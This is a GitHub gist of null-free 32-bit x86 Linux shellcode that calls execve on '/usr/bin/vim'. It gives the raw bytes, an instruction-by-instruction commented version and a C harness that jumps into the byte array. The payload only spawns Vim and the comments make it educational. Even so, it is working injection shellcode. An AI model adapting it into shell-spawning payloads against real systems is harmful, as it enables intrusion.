Skip to content

Instantly share code, notes, and snippets.

@0
Created July 20, 2014 05:12
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 0/b67302de3239dfc736da to your computer and use it in GitHub Desktop.
Save 0/b67302de3239dfc736da to your computer and use it in GitHub Desktop.
x86 shellcode

x86 shellcode

Back in 2010, I needed some shellcode, so I wrote this. It spawns Vim rather than a shell, so I guess it's technically "vimcode".

It is, of course, null-free. There is a commented version in the test file, but here it is in its entirety:

\x31\xc0\x31\xc9\x99\x50\x68\x2f\x76\x69\x6d\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xb0\x0b\xcd\x80

Usage

This is 32-bit shellcode, so if you want to run the test file on x86_64, you'll need multilib GCC:

gcc -m32 -o test test.c
const char shellcode[] =
"\x31\xc0" // xor %eax, %eax a = 0
"\x31\xc9" // xor %ecx, %ecx c = 0 (*argv[])
"\x99" // cdq d = 0 (*envp[])
"\x50" // push %eax (push the null-terminated
"\x68\x2f\x76\x69\x6d" // push $0x6d69762f string "/usr/bin/vim")
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x68\x2f\x75\x73\x72" // push $0x7273752f
"\x89\xe3" // mov %esp, %ebx b = &filename
"\xb0\x0b" // mov $0x0b, %al a = 11 (execve)
"\xcd\x80"; // int $0x80 syscall
int main() {
((void (*)()) shellcode)();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment